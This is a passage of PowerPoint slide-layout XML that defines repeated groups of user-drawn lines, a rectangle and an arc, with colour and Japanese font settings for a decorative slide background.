                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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061" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1068089" name="Rectangle 57" descr="60%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8090" name="Line 58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56" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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051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2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80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-7620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" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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106809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6809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5240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" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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46" name="Line 14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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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56" name="Line 24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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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  <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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40458C"/>
                    </a:solidFill>
                    <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr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80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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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-7620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" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
